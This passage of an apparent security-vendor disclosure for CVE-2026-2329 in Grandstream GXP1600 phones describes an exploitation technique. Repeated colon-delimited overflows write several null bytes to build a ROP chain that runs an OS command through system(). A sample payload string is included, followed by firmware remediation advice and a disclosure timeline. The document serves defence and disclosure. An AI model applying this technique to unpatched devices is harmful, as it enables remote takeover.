	LOAD	0x012000 	0x00022000 	0x00022000 0x00498 		0x0055c 	RW		0x8000
	DYNAMIC	0x01202c 	0x0002202c 	0x0002202c 0x00168 		0x00168 	RW		0x4

⠀

With PIE not enabled, and no suitable info leak to leak a VA from another Shared Object (SO) located higher in the address space, a load address of 0x00008000 will require us to write multiple null bytes during exploitation in order to construct a ROP chain, as every VA used within the ROP chain will have at least one null byte. However, the vulnerability only allows for a single null terminator byte to be written during the overflow.

To overcome this limitation, we can rely on the fact that the vulnerable function will process the attacker-controlled request parameter as a colon-delimited string of multiple identifiers. Every time a colon is encountered, the overflow can be triggered a subsequent time via the next identifier. We can leverage this, and the ability to write a single null byte as the last character in the current identifier being processed, to write multiple null bytes during exploitation.

For example, if we wanted to write a sequence of bytes with 5 null characters in it, e.g., “EEE0DDDDDDD0CCCCCCCC00AAAAAAAAAAA0” (where 0 is a null byte), we can trigger the overflow 5 times. By adjusting the identifier value used to trigger each instance of the overflow, we can precisely place a null character at the desired locations. The table below shows how, in this contrived example, we can construct each separate identifier string in order to place a trailing null terminator character at the desired location. Upon triggering the overflow 5 times in succession, the final memory layout will be as we expect.

⠀

Overflow 1 (33 bytes + null terminator)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0

Overflow 2 (21 bytes + null terminator)

BBBBBBBBBBBBBBBBBBBBB0

Overflow 3 (20 bytes + null terminator)

CCCCCCCCCCCCCCCCCCCC0

Overflow 4 (11 bytes + null terminator)

DDDDDDDDDDD0

Overflow 5 (3 bytes + null terminator)

EEE0

Final Memory Layout(34 bytes)

EEE0DDDDDDD0CCCCCCCC00AAAAAAAAAAA0

⠀

We can therefore construct a malicious colon-delimited request parameter to achieve the above (note that, for brevity in this example, the length values here don’t assume the required 64 bytes of padding to overflow the initial small buffer):

⠀

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:BBBBBBBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCCCCC:DDDDDDDDDDD:EEE

⠀

With the ability to write multiple null bytes, we can proceed to gather the ROP gadgets needed to build out a ROP chain. We choose to create a ROP chain that will execute an arbitrary OS command via the system standard C library function, before terminating the process gracefully via the exit standard C library function to avoid crashing the process. The accompanying Metasploit exploit module’s source code details the entire ROP chain.

Remediation

To remediate CVE-2026-2329, Grandstream users running either GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 or GXP1630 devices should upgrade their firmware to version 1.0.7.81 or above. The latest Grandstream firmware can be found here.

For additional details from the vendor, please see the Grandstream PSIRT page.

Disclosure timeline

  • January 6, 2026: Rapid7 makes initial outreach to Grandstream.

  • January 20, 2026: Rapid7 makes another outreach to Grandstream.

  • January 20, 2026: Grandstream responds to the initial outreach.

  • January 21, 2026: Rapid7 and Grandstream establish a secure communication mechanism.

  • January 22, 2026: Rapid7 discloses the technical writeup and exploit code to Grandstream, who confirms receipt the same day.

  • February 2, 2026: Grandstream indicates a patch has been made available in the GXP1600 firmware version 1.0.7.81.

  • February 3, 2026: Grandstream reaffirms the issue has been resolved in the latest GXP1600 firmware version 1.0.7.81.

  • February 6, 2026: Rapid7 indicates to Grandstream that a CVE has not been assigned and offers to be the CNA for this disclosure. Rapid7 highlights to Grandstream that no public disclosure has occurred, and that it is Rapid7’s intention to disclose publicly in the coming days.

  • February 7, 2026: Grandstream agrees that Rapid7 can be the CNA in this disclosure and requests additional CVE record information. 

  • February 11, 2026: Rapid7 provides the requested CVE record information to Grandstream. Rapid7 highlights to Grandstream that firmware version 1.0.7.81 does remediate the vulnerability, as shown by Rapid7 Labs reverse engineering the publicly available firmware. Rapid7 states that a public disclosure will occur on February 18, 2026.

  • February 18, 2026: This disclosure.

The collective thoughts of the interwebz